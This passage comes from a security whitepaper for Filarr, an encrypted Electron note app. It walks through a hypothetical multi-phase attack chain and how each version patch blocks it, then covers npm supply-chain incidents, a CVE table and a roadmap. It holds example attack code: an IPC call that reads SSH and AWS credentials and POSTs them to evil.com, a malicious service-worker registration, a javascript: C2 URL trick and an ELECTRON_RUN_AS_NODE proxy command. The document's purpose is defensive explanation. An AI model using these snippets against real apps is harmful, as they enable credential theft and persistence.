</foreignObject></svg>
DOMPurify let it through (because <svg> was allowed), the iframe loaded, its srcdoc executed the script, and phase 1 succeeded: the attacker had JavaScript running in the Filarr renderer context.
In v2.2.1 and later, FORBID_TAGS includes svg, foreignObject, iframe, and srcdoc is in FORBID_ATTR. DOMPurify entirely removes the block before DOM insertion. The payload no longer has an HTML injection vector. Phase 1 fails.
11.3 Phase 2 — Privilege Escalation via IPC (T1068)
Suppose phase 1 succeeded despite everything, via a hypothetical future 0-day in DOMPurify that passes all filters. The attacker now has JavaScript in the renderer. Their objective: exfiltrate your private SSH key for use from their own infrastructure.
In the version prior to v2.2.1, the attacker simply wrote:
const sshKey = await window.electron.ipcRenderer.invoke(
'import:readFile',
'C:\\Users\\Victim\\.ssh\\id_ed25519'
);
const awsCreds = await window.electron.ipcRenderer.invoke(
'import:readDirectory',
'C:\\Users\\Victim\\.aws'
);
fetch('https://evil.com/collect', {
method: 'POST',
body: JSON.stringify({ sshKey, awsCreds })
});
The main process executed the IPC without any path validation. Out went the SSH key, the AWS credentials, the .env files of every readable project, and .git/config files potentially containing GitHub tokens. All without a single UAC prompt, without any visible notification for the user, without an alert log: the IPC handler treated the operation as perfectly legitimate.
In v2.2.1, the import:readFile handler now verifies that the requested path is part of approvedImportPaths, a Set only populated by native showOpenDialog dialogs. The attacker's script can at most trigger that dialog via import:selectFile, but the dialog is visible UI and only a path the user actually picks ever enters the Set; the script cannot approve a path by itself. Its attempt to read id_ed25519 returns null, and a warning is logged on the main side: [import:readFile] Refused unapproved path: C:\Users\Victim\.ssh\id_ed25519. Phase 2 fails.
11.4 Phase 3 — Persistence (T1546)
A sophisticated attacker doesn't stop at one-shot exfiltration; they want to survive a security update that would patch the initial vulnerability. The Service Worker is an ideal tool for this: once registered, it intercepts all fetch() requests from the app and can inject its code at each page load, even after the user received and installed a patch.
In the version prior to v2.2.1, Filarr inherited a serviceWorkerRegistration.register() from the create-react-app template. An attacker could register their own malicious SW:
await navigator.serviceWorker.register('/stolen-sw.js');
And from there, the SW would persist between sessions, survive updates (because the SW is stored in Electron's Chromium profile, not in app.asar), and reinject its payload at each load. Neutralizing this kind of persistence would require the user to completely uninstall the app and manually delete their profile — an operation few users know how to do.
Version v2.2.1 fixes this radically: src/index.js explicitly calls serviceWorkerRegistration.unregister() at startup, and purges all Cache Storage with caches.keys().then(keys => Promise.all(keys.map(k => caches.delete(k)))). If an SW inherited from v2.1.x was present, it's unregistered at the first v2.2.1+ launch. The attacker can no longer establish persistence via this path.
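Assembled, that startup cleanup amounts to a few lines; this sketch simply combines the two calls quoted above (serviceWorkerRegistration being the helper module from the Create React App template):
// src/index.js startup, per the description above
import * as serviceWorkerRegistration from './serviceWorkerRegistration'; // CRA template module

serviceWorkerRegistration.unregister(); // evict any SW inherited from v2.1.x
if ('caches' in window) {
  // purge all Cache Storage left behind by a previous SW
  caches.keys().then((keys) => Promise.all(keys.map((k) => caches.delete(k))));
}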
11.5 Phase 4 — Command & Control
An attacker who has established persistence then wants to maintain a communication channel with their C2 (command and control) infrastructure. A subtle approach is to disguise requests as external link openings, which seem legitimate — a user clicking a link in a note expects the browser to open.
In the version prior to v2.2.1, the open-external IPC was guarded by a simple startsWith('https://'). The attacker could therefore construct a URL like https://filarr.com#javascript:window.open('https://evil.com/c2') that passed the check but whose fragment was interpreted differently by some native apps associated with the scheme, potentially opening an attack surface.
Version v2.2.1 uses strict new URL(url) parsing that rejects any protocol other than http: / https:, ASCII control characters, and URLs over 8 KB (a cap chosen to stay well clear of length-related bugs in OS URL handlers). The same validation is applied to URLs returned by the backend for Stripe checkouts, as defense in depth against a compromised backend trying to push a javascript: URL.
11.6 Phase 5 — Native privilege abuse
Final scenario, suppose an attacker who already has user-level local access to the machine (without XSS), perhaps via a trojan downloaded elsewhere. They want to use the signed Filarr binary as a proxy to execute their code and escape heuristic detections.
ELECTRON_RUN_AS_NODE=1 "C:\Program Files\Filarr\Filarr.exe" ./payload.js
Before v2.2.2, only some of the fuses were applied (and earlier still, none at all). This command line would turn Filarr into a Node.js runtime and execute payload.js with the user's privileges. From the OS's point of view (and the EDR's), it's the signed Filarr binary doing the work, not a suspicious executable, so the payload is far less likely to be flagged.
In v2.2.2+, the RunAsNode: false fuse is flipped in the binary: the ELECTRON_RUN_AS_NODE environment variable is simply ignored, even if set. Same for NODE_OPTIONS, --inspect, and --inspect-brk. The attacker can no longer hijack the binary as a proxy.
11.7 The overall result
To compromise a Filarr v2.3.1 user via the described scenario, the attacker would need simultaneously: a 0-day in DOMPurify 3.4+ (none public in 2026) to inject JS, a 0-day in Electron 41 (patches up to date) to escape the Chromium sandbox, a flaw in a specific IPC handler (each handler validated by audit), a C2 channel that survives the strict URL validation and the CSP, and a persistence method bypassing service workers, environment variables, and ASAR patching. That's a five-link chain, each link requiring an independent break. This is precisely the objective of defense in depth: stack enough independent layers that no isolated break compromises the whole.
12. Supply chain
npm supply chain attacks have become the norm in recent years. It's instructive to walk through the main incidents to understand the form these attacks take in practice and what Filarr does to reduce its exposure.
The event-stream incident of 2018 is emblematic. The package's historical maintainer, Dominic Tarr, accepted an offer of help from a new contributor, who eventually became the main maintainer after Tarr disengaged. That contributor then published a version whose malicious code (hidden in a new dependency, flatmap-stream) specifically targeted Copay, a Bitcoin wallet application, harvesting private keys from high-balance wallets. The event-stream package had about 2 million downloads per week at the time — virtually every Node.js project used it transitively. Dominic Tarr's post-mortem is an enlightening read on open source maintenance dynamics and the risks of handing over maintainership by default.
The ua-parser-js incident of 2021 was more direct: the maintainer's npm account was compromised via credential stuffing (password reuse from another leak), and three malicious versions were published within hours. They contained an XMRig crypto miner and a credential stealer targeting environment variables containing tokens. The package had 7 million downloads per week. Recovery took several days of coordination between GitHub, npm, and the maintainer who had to regain control of their account and publish clean versions. The advisory details the timeline.
The node-ipc incident of 2022 introduced a new concept: "protestware". The maintainer, RIAEvangelist, deliberately shipped an update whose code overwrote files on machines whose IP geolocated to Russia or Belarus, in protest of the invasion of Ukraine. The package was used by Vue.js tooling and other major projects. Beyond the ethical debate on the legitimacy of the act, the incident was a reminder that any malicious maintainer has the technical capacity to introduce any code into any dependency, and that the open source community has no systemic mechanism to prevent it. Detailed Snyk post-mortem.
And also in 2022, colors.js and faker.js: maintainer Marak Squires published versions printing "LIBERTY LIBERTY LIBERTY" in an infinite loop, protesting maintaining an unpaid open source project used by multinationals. It wasn't exactly malware but self-inflicted denial of service — and it broke thousands of production applications for several hours. BleepingComputer article.
Facing this reality, Filarr adopts several risk reduction strategies without being able to claim immunity. The first is quarterly audit via npm audit --audit-level=high, automatically blocking in CI if a new high or critical vulnerability appears. This discipline led to the major upgrades documented in the changelog: jspdf (critical XSS), axios (SSRF + DoS), dompurify (sanitizer bypass), electron (18 CVEs).
The second strategy is the strict CSP that limits what a compromised dependency can do at runtime. Even if a package like @tiptap/extension-foo published a version tomorrow trying to load code from evil.com, script-src 'self' + cdnjs would block the request. It's not protection against statically injected code (which is part of the bundle), but it's a defense line against payloads attempting network exfiltration.
The third is binary integrity validation via Electron fuses. EnableEmbeddedAsarIntegrityValidation: true detects any app.asar modification after signing. An attacker who managed to patch the binary on disk (either via a local vulnerability or via a dependency writing to the install directory) fails at the next launch. OnlyLoadAppFromAsar: true also refuses to load from an app/ folder next to the binary — a classic persistence vector where malware drops a folder with modified code that would have priority over the ASAR.
The fourth strategy is simply limited dependency scope: we avoid packages with thousands of transitives. When we add a new dependency, I read the code (at least its entry point and the top of the main file) before integrating it. It's an artisanal measure that doesn't scale but makes a difference at small scale.
The honest limit, which must be acknowledged, is that none of these defenses fully protects against a compromised transitive dependency with a payload executing in the renderer. If @tiptap/extension-foo were compromised tomorrow and injected runtime JS, CSP would block external communication but not local execution or use of exposed IPCs (which are themselves validated, but an inventive payload could combine several handlers to reach its goal). The robust long-term answer requires reproducible builds (whose deterministic output allows anyone to verify that the final binary matches the published source code), regular and deep audits, and minimal renderer scope. It's on the roadmap for upcoming versions.
13. CVE history
As of April 18, 2026, in version 2.3.1, the state of the attack surface is as follows: zero critical vulnerabilities detected by npm audit, zero high vulnerabilities in direct runtime dependencies, and 47 transitive vulnerabilities all confined to react-scripts. This last point deserves clarification: react-scripts is the Create React App build toolbox (webpack, babel-loader, jest, postcss, etc.) used only at renderer build time. The vulnerabilities it drags (mainly old webpack-dev-server and svgo versions) don't affect the packaged application's runtime — they're in the developer build chain. We monitor them, document them, but don't consider them production risks.
Recent attack surface cleanup happened in four major steps documented here with GHSA references where applicable:
| Version | Upgrade | Major CVE fixed |
|---|---|---|
| v2.2.0 | jspdf 4.2.0 → 4.2.1 | GHSA-wfv2-pwc8-crg5 — critical XSS CVSS 9.6 (New Window HTML injection) |
| v2.2.0 | axios 1.7.7 → 1.15.0 | DoS via __proto__ in mergeConfig (GHSA-wf5p-g6vw-rhxx), SSRF via NO_PROXY, cloud metadata exfil via header injection |
| v2.2.0 | dompurify 3.3.1 → 3.4.0 | 5 sanitizer bypasses (mutation-XSS, ADD_ATTR/ADD_TAGS bypass of FORBID_TAGS, prototype pollution via USE_PROFILES, URI bypass) |
| v2.3.0 | electron 39 → 41 | 18 Electron CVEs — context isolation bypass via contextBridge VideoFrame, multiple use-after-free in offscreen paint / download dialog / PowerMonitor, path injection in setAsDefaultProtocolClient (Windows), USB device spoofing, renderer command-line switch injection, unquoted executable path in setLoginItemSettings (Windows), header injection in custom protocol handlers, and more |
| v2.3.0 | electron-builder 24 → 26 | Required by Electron 41 |
To these dependency upgrades are added the 8 internal v2.2.1 patches documented elsewhere: IPC path traversal, ZIP bomb, Math.random UUIDs, service worker disabled, timing attack on hash comparison, strict URL protocol check, widened DOMPurify FORBID_TAGS, safeStorage fail-closed. Each of these patches was identified during the full post-v2.2.0 audit and fixed within the following week.
14. Comparison with other tools
To place Filarr relative to tools it might be compared with in the encrypted productivity ecosystem, here's a synthetic table of each's cryptographic and architectural choices:
| Aspect | Filarr | Signal | 1Password | Bitwarden | Obsidian | Notion |
|---|---|---|---|---|---|---|
| Zero-knowledge storage | ✅ | ✅ | ✅ | ✅ | N/A (local only) | ❌ (servers read everything) |
| File encryption | AES-256-GCM | AES-256-CTR + HMAC-SHA256 | AES-256-GCM | AES-256-CBC + HMAC-SHA256 | ❌ (plain) | ❌ (plain server-side) |
| KDF | Argon2id + PBKDF2-SHA-512 (hybrid) | N/A (no password) | PBKDF2-SHA-256 + Secret Key | PBKDF2 → Argon2id (progressive) | N/A | Bcrypt server-side |
| Multi-device | ECDH + HKDF | Double Ratchet | 1Password Secret Key sync | Password + device key | Third-party sync (iCloud, paid Obsidian Sync) | Native cloud sync (non-E2E) |
| Local-first | ✅ | ❌ (servers for push) | ❌ (vault encrypted on server) | Partial | ✅ | ❌ |
| Open source | Partially (Electron app) | ✅ (server + clients) | ❌ | ✅ | ❌ (plugin ecosystem only) | ❌ |
| External audit | Planned | Trail of Bits, NCC, academic | Cure53 (2021, 2023) | Cure53 (2020, 2022), Insight Risk | ❌ | External (non-public) |
| Two-factor authentication (2FA) | ✅ TOTP + 8 backup codes | ✅ Registration Lock (PIN) | ✅ TOTP, FIDO2 | ✅ TOTP, FIDO2, YubiKey | ✅ (Obsidian Sync) | ✅ TOTP, WebAuthn |
Filarr positions itself in a specific market gap: between Obsidian, an excellent local-first tool that encrypts nothing by default and depends on third-party plugins for encryption, and Bitwarden, exemplary in zero-knowledge but exclusively dedicated to passwords. No other tool combines zero-knowledge, local-first, and full workspace (notes + files + graph + canvas). This niche was the reason to build Filarr rather than rely on an existing tool.
Technical choice differences are generally explained by different use cases. Signal has no user password because it's a messaging app where local installation is meant to be fast and friction-free: everything derives from the PIN plus Secure Value Recovery, a sophisticated protocol that stores an encrypted copy of the master key server-side, decryptable only with the correct PIN. 1Password has the Secret Key, a high-entropy secret the user stores off-server (typically on a printed QR code), which combines with the password to strengthen the derived key. We considered this model for Filarr, but the UX degradation (handling an additional secret on each new device) was deemed incompatible with the tool's mainstream target: users who regularly forget their password would also lose their Secret Key, and the support cost would exceed the security gain for the targeted user base. Bitwarden uses AES-CBC + HMAC-SHA256, a valid authenticated-encryption construction but slower than GCM and historically more prone to implementation errors (padding oracles, missing MACs); their Argon2id migration is in progress. Obsidian encrypts nothing by default because their philosophy is maximum portability of notes (plain-text Markdown); third-party plugins like Meld Encrypt exist, but security then depends on plugin quality. Notion stores everything in cleartext server-side and their privacy policy explicitly authorizes employee access to data for "support", placing them in a different category: centralized collaboration tools, not private personal vaults.
15. Security roadmap
What we don't have yet, presented honestly: an independent external security audit is being prepared with a targeted firm (Cure53 or Trail of Bits, depending on availability and budget). The estimated budget is €15,000 to €30,000 depending on scope — we'll favor wide coverage over extreme depth on a single component. The final report will be made fully public, including findings we'd consider embarrassing, because transparency is the only way to turn an audit into a gain in user trust.
Authenticode signing for Windows requires an EV (Extended Validation) certificate costing about €400 per year and requiring KYC verification by a CA. It's in progress, but we prioritized runtime hardening first. Without EV signing, SmartScreen shows a warning on first launch that users must click through — it's ugly, but not a blocker. Apple notarization for macOS follows a similar path: Developer Program enrollment done, CI automation in progress.
Reproducible builds require a deterministic build environment where compile dates are fixed, file order is stable, and all inputs are under version control. It's under study for v2.4; the main obstacle is that some dependencies (notably argon2 native prebuilds) embed build metadata that varies.
Post-quantum encryption via CRYSTALS-Kyber (standardized in 2024 as ML-KEM in NIST FIPS 203) is on the ideas list for pairing and potentially for long-term blobs. The approach would be hybrid — classical + post-quantum combined — as Signal did with PQXDH in 2023 (WireGuard offers a comparable hedge through its optional pre-shared keys). The hybrid approach avoids betting everything on Kyber, which is far younger and less battle-tested than the classical primitives, while gaining resistance against an attacker recording traffic today to decrypt it tomorrow with a quantum computer.
An official bug bounty is planned after the external audit — we want to first pay for "easy" findings (those a systematic audit will find) before opening a bounty that would pay for them at public price. Once the base is clean, the bounty makes more sense.
Finally, the custom app:// protocol to replace file:// in production will allow definitively closing the GrantFileProtocolExtraPrivileges fuse and significantly hardening CSP (currently default-src 'self' on file:// has fuzzy semantics; on a custom app:// it's clean and strict). The work requires migrating React bundle loading, fonts, pdf.js workers, images, and i18n locales, and testing the full preview chain. Count on one to two weeks of work plus intensive testing.
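For the curious, the migration target looks roughly like the following sketch, using Electron's protocol.handle API (available since Electron 25); the scheme privileges and bundle paths are illustrative, not the final implementation:
// main process — sketch of a custom app:// scheme replacing file://
import { app, net, protocol } from 'electron';
import * as path from 'path';
import { pathToFileURL } from 'url';

// Must run before the app 'ready' event
protocol.registerSchemesAsPrivileged([
  { scheme: 'app', privileges: { standard: true, secure: true, supportFetchAPI: true } },
]);

app.whenReady().then(() => {
  protocol.handle('app', (request) => {
    const { pathname } = new URL(request.url);
    const root = path.join(__dirname, 'renderer');          // packaged renderer bundle (illustrative)
    const file = path.normalize(path.join(root, pathname));
    if (!file.startsWith(root + path.sep)) {
      return new Response('Forbidden', { status: 403 });    // reject anything resolving outside the root
    }
    return net.fetch(pathToFileURL(file).toString());
  });
});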
All this is publicly documented on the roadmap, not hidden.
16. Summary
If you had to remember only five statements from this article:
- Your content is encrypted with AES-256-GCM using a key only your password can derive, via Argon2id and PBKDF2-SHA-512 at 600,000 iterations, and this key never leaves your machine in cleartext.
- Filarr's servers technically cannot read your data — not under subpoena, not if their infrastructure is compromised; they only see opaque blobs.
- Multi-device pairing uses ECDH P-256 and HKDF-SHA-256 with a domain separator, so the FEK is exchanged end-to-end without the server being able to reconstruct it.
- The Electron binary is hardened against all known abuses: 8 explicit fuses with strictlyRequireAllFuses, contextIsolation, the Chromium sandbox, a strict CSP, an IPC allowlist, defensive DOMPurify, and SSRF protection.
- Dependencies are audited on every release, with a status as of April 18, 2026 of zero critical or high runtime vulnerabilities, after 8 internal fixes in v2.2.1 and 18 Electron CVEs fixed in v2.3.0.
Filarr doesn't claim to be perfect. It claims to be explicit: every choice is documented with its exact parameters, every tradeoff is stated, every fixed CVE is dated and referenced. It's up to you to judge whether this architecture matches your threat model — if so, you can download the app, create your first profile, and encrypt your first file in a few minutes. If it doesn't suit you, email contact@filarr.com with [Security] prefix in the subject to tell us what's missing. Response within 48 business hours, and no prosecution of vulnerability researchers acting in good faith (safe harbor).
17. References and further reading
Standards & specifications
- NIST SP 800-38D — Recommendation for Block Cipher Modes of Operation: GCM and GMAC
- NIST SP 800-56C Rev.2 — Recommendation for Key-Derivation Methods in Key-Establishment Schemes
- RFC 5869 — HMAC-based Extract-and-Expand Key Derivation Function (HKDF)
- RFC 8446 — The Transport Layer Security (TLS) Protocol Version 1.3
- RFC 9106 — Argon2 Memory-Hard Function for Password Hashing and Proof-of-Work Applications
- FIPS 203 (ML-KEM) — Module-Lattice-based Key-Encapsulation Mechanism
Attacks & research
- Böck, Zauner, Devlin et al. — Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS (2016) — the Forbidden Attack
- Bellare & Namprempre — Authenticated Encryption: Relations among Notions and Analysis of the Generic Composition Paradigm (2008)
- MITRE ATT&CK — Enterprise Matrix
- Password Hashing Competition — PHC
Comparables & inspirations
- Signal — Technical Documentation
- 1Password — 1Password Security Design White Paper
- Bitwarden — Security Whitepaper
- ProtonMail — Security Features
- Tresorit — Encryption Whitepaper
Mathis Belouar-Pruvot · Filarr creator · filarr.com · Last revision: April 18, 2026 (v2.3.1)